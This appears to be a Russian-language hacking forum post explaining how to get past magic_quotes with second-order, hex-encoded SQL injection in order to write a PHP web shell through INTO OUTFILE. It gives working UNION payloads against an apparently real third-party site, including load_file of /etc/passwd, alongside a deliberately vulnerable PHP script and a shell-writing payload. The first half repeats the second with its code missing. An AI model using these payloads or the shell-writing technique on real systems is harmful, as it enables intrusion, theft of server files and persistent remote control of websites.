Есть MySQL инъекция:
смысл в том, что текущий пользователь БД root и как видно file_priv есть, но казалось бы шелл через into outfile залить нельзя, так как экранируются кавычки, на самом деле шелл здесь (и в подобных скулях) через into outfile залить не сложно.
К теории, есть например такой скрипт:
(набросал я его чисто для наглядности и примера и показываю на примере своей бд)
обратившись к скрипту:
видим:
(0x27- код кавычки) видим:
Сделаем "внутренний" инъект-запрос:
захексим его и подставим в первое поле первого ("внешнего") запроса:
результат:
т.к. данные полученные из sql-запроса не так часто слешируют/фильтруют то получается что этот "внутренний" запрос выполняется без ошибок, даже при наличии кавычек.
Если "внутренний" запрос будет:
то в запросе
он выполнится без проблем даже при magic_quotes on
Обратимся к первой инъекции, если мы в третье поле подставим:
увидим безобидную надпись magic_qotes is sux
а могли бы составить и более опасный запрос с присутствием into outfile 'blabla' и он тоже бы выполнился.
http://www.thefump.com/lyrics.php?id=-99999+union+select+1,load_file(0x2f6574632f706173737764),3,4,USER(),6,7,8,9,10,VERSION(),12,13/*
К теории, есть например такой скрипт:
<?php
mysql_connect('localhost','root','');
mysql_select_db('intbrd');
$id=$_GET["id"];
$sql = "SELECT u_id,u__email,u__name FROM `User` where u_id=".$id;
$result = MySQL_QUERY($sql);
echo mysql_error();
while($us = MySQL_FETCH_ARRAY($result))
{
echo $us['u__email'].":".$us['u__name'];echo "<br>";
$onl = MySQL_QUERY("SELECT o_uid,o_key FROM online WHERE o_uid = ".$us["u_id"]);
while($usonl = MySQL_FETCH_ARRAY($onl))
echo $usonl["o_uid"].':'.$usonl["o_key"];
}
?>
обратившись к скрипту:
http://localhost/erase.php?id=-2+union+select+1,2,3/*
2:3
обратившись:http://localhost/erase.php?id=-2+union+select+0x27,2,3/*
2:3
происходит это потому, что данные, полученные из первого запроса, вставляются во второй запрос.Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in Z:\home\localhost\www\erase.php on line 20
Сделаем "внутренний" инъект-запрос:
-2 union select '999',111/*
http://localhost/erase.php?id=-2+union+select+0x2D3220756E696F6E2073656C6563742027393939272C3131312F2A,2,3/*
результат:
2:3
999:111
Если "внутренний" запрос будет:
-2 union select '<?php include "shell.php"; ?>,111 into outfile '/bla/bla/bla.php'/*
$onl = MySQL_QUERY("SELECT o_uid,o_key FROM online WHERE o_uid = ".$us["u_id"])
он выполнится без проблем даже при magic_quotes on
Обратимся к первой инъекции, если мы в третье поле подставим:
и выполним:-1 union select 'magic_qotes is sux'/*
http://www.thefump.com/lyrics.php?id=-99999+union+select+1,2,0x2D3120756E696F6E2073656C65637420276D616769635F716F74657320697320737578272F2A,4,5,6,7,8,9,10,11,12,13/*
а могли бы составить и более опасный запрос с присутствием into outfile 'blabla' и он тоже бы выполнился.